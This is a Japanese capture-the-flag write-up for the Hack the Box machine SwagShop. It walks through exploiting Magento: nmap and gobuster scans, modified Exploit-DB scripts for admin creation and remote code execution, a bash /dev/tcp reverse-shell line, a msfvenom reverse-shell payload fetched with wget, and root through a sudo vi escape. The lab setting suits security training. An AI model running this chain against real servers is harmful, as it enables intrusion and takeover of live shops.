【Hack the Box write-up】SwagShop

June 20, 2020


筆者は Hack the Box 初心者です。 何か訂正や補足、アドバイスなどありましたら、コメントか Twitter までお願いします。 さんぽし(@sanpo_shiho) | Twitter

cheat sheet

以下で cheat sheet としてツールの使い方などをまとめています。参考にしてください。 github | sanposhiho/MYCHEATSHEET

machine について

難易度は easy です スクリーンショット 2020-06-20 0.04.51.png


kali@kali:~$ nmap -sC -sV
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-19 10:12 EDT
Nmap scan report for
Host is up (0.27s latency).
Not shown: 998 closed ports
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
|   256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
|_  256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home page
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.17 seconds

80 番の調査


kali@kali:~$ gobuster dir -u  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t 40 -x php,txt
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:  
[+] Threads:        40
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt
[+] Timeout:        10s
2020/06/18 19:49:21 Starting gobuster
/index.php (Status: 200)
/media (Status: 301)
/includes (Status: 301)
/lib (Status: 301)
/install.php (Status: 200)
/app (Status: 301)
/js (Status: 301)
/api.php (Status: 200)
/shell (Status: 301)
/skin (Status: 301)
/cron.php (Status: 200)
/LICENSE.txt (Status: 200)
/var (Status: 301)
/errors (Status: 301)

スクリーンショット 2020-06-19 23.24.26.png


kali@kali:~$ searchsploit Magento
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                                                    |  Path
                                                                                                                                                                                                  | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Magento 1.2 - '/app/code/core/Mage/Admin/Model/Session.php?login['Username']' Cross-Site Scripting                                                                                                | exploits/php/webapps/32808.txt
Magento 1.2 - '/app/code/core/Mage/Adminhtml/controllers/IndexController.php?email' Cross-Site Scripting                                                                                          | exploits/php/webapps/32809.txt
Magento 1.2 - 'downloader/index.php' Cross-Site Scripting                                                                                                                                         | exploits/php/webapps/32810.txt
Magento < 2.0.6 - Arbitrary Unserialize / Arbitrary Write File                                                                                                                                    | exploits/php/webapps/39838.php
Magento CE < - (Authenticated) Remote Code Execution                                                                                                                                      | exploits/php/webapps/37811.py
Magento Server MAGMI Plugin - Multiple Vulnerabilities                                                                                                                                            | exploits/php/webapps/35996.txt
Magento Server MAGMI Plugin 0.7.17a - Remote File Inclusion                                                                                                                                       | exploits/php/webapps/35052.txt
Magento eCommerce - Local File Disclosure                                                                                                                                                         | exploits/php/webapps/19793.txt
Magento eCommerce - Remote Code Execution                                                                                                                                                         | exploits/xml/webapps/37977.py
eBay Magento - PHP FPM XML eXternal Entity Injection                                                                                                                                      | exploits/php/webapps/38573.txt
eBay Magento CE - Unrestricted Cron Script (Code Execution / Denial of Service)                                                                                                           | exploits/php/webapps/38651.txt
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
kali@kali:~$ searchsploit -p 37977
  Exploit: Magento eCommerce - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/37977
     Path: /usr/share/exploitdb/exploits/xml/webapps/37977.py
File Type: ASCII text, with CRLF line terminators

Copied EDB-ID #37977's path to the clipboard.



37977.py の中を色々弄ります(コメントになってない余計な部分の削除、target.com を に)

kali@kali:~$ python 37977.py
Check with creds forme:forme

スクリーンショット 2020-06-19 11.33.58.png

スクリーンショット 2020-06-19 11.24.13.png

login できました



kali@kali:~$ searchsploit -p 37811
  Exploit: Magento CE < - (Authenticated) Remote Code Execution
      URL: https://www.exploit-db.com/exploits/37811
     Path: /usr/share/exploitdb/exploits/php/webapps/37811.py
File Type: Python script, ASCII text executable, with CRLF line terminators

Copied EDB-ID #37811's path to the clipboard.

これを使います この exploit がそれはもういろんなエラーを吐くんですわ 以下の変更を加えて解決しました。

以下の二行をコメントアウト 参考:https://forum.hackthebox.eu/discussion/2304/swagshop-rce

#br.form.new_control('text', 'login[username]', {'value': username})  # Had to manually add username control.

url の 7d を 2y に変更(実際に url にアクセスすればわかりますが、7d とか 2y は期間を表しています(7days, 2years)

- request = br.open(url + 'block/tab_orders/period/7d/?isAjax=true', data='isAjax=false&form_key=' + key)
+ request = br.open(url + 'block/tab_orders/period/2y/?isAjax=true', data='isAjax=false&form_key=' + key)
kali@kali:~$ python 37811.py '' "uname -a"
Linux swagshop 4.4.0-146-generic #172-Ubuntu SMP Wed Apr 3 09:00:08 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

RCE が通りました

shell をとる

bash -i >& /dev/tcp/ 0>&1はうまく行かなかったので msfvenom のスクリプトを upload する方法を取りました。

kali@kali:~$ msfvenom -p linux/x86/shell/reverse_tcp LHOST= LPORT=1212  -f elf > shell.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
kali@kali:~$ python -m SimpleHTTPServer
Serving HTTP on port 8000 ... - - [19/Jun/2020 09:53:12] "GET /shell.elf HTTP/1.1" 200 -
kali@kali:~$ python 37811.py '' "wget"

kali@kali:~$ python 37811.py '' "chmod +x ./shell.elf"

kali@kali:~$ python 37811.py '' "./shell.elf"
msf5 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (linux/x86/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST       yes       The listen address (an interface may be specified)
   LPORT  1212             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on
[*] Sending stage (36 bytes) to
[*] Command shell session 1 opened ( -> at 2020-06-19 09:56:01 -0400

python3 -c 'import pty; pty.spawn("/bin/bash")'


www-data@swagshop:/var/www/html$ sudo -l
sudo -l
Matching Defaults entries for www-data on swagshop:
    env_reset, mail_badpass,

User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*
www-data@swagshop:/var/www/html$ sudo /usr/bin/vi /var/www/html/index.php

vim 内で shell を起動すると

 * Magento
 * This source file is subject to the Open Software License (OSL 3.0)
 * that is bundled with this package in the file LICENSE.txt.
 * It is also available through the world-wide-web at this URL:
 * http://opensource.org/licenses/osl-3.0.php
 * If you did not receive a copy of the license and are unable to
 * obtain it through the world-wide-web, please send an email
 * to [email protected] so we can send you a copy immediately.
 * Do not edit or add to this file if you wish to upgrade Magento to newer
 * versions in the future. If you wish to customize Magento for your
 * needs please refer to http://www.magentocommerce.com for more information.
 * @category   Mage
 * @package    Mage

root が取れます

# whoami


PE は典型的なものでした。37977.py の改変が大変だった…

shell のとり方別解

別解というほどでもないですが、linux/x86/shell_reverse_tcpを payload に使うと nc でも安定した shell が取れます